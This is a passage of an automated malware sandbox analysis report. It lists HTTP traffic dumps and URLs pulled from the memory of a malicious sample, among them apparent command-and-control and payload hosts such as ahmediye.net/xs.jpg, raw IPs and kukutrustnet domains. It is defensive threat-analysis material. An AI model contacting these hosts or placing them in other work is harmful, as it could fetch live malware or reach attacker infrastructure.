72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:24 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:29 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:33 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:38 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:42 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:47 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:51 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:04:55 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: YMZwp.exe, 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp, YMZwp.exe, 00000009.00000003.1281847321.0000000000A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
        Source: cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://173.193.19.14/logo.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://a3inforservice.com.br/images/logof.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?1209c47=37828750
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?1786b5d7=1578817372
        Source: dllhost.exe, 0000000C.00000003.3162488836.0000029948E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?334f6b3c=870089576
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?34f3b0d=3886687631
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?3fc8f944=1041285988
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?3fc8f944=1041285988j
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?5a80b326=-737830608
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?6582b518=-1852285480
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?71a0be=14893436
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?71a0be=14893436q
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?787713d7=1515414323
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?7dfe147e=-67360516=
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?8effb8fc=117276892
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?8effb8fc=117276892f
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?972d623=951125202
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?9a7e303d=-814051145
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?9a7e303d=-814051145H
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?a4a56c66=-1532662682
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?a9f1e262=1407435972
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?baaa592=1761595938
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?d1cd8e49=1614413969
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?d6d21078=-2072628888
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?ef46a9a2=-1402908630
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?ef46a9a2=-14029086306
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?f3a2ce17=-2074342170
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?17915f51=790806178
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?17915f51=790806178m
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?17b6de9=99465124~
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?20a6d64=68475592
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?3c7c82ae=1557994188
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?5d86df=18388125
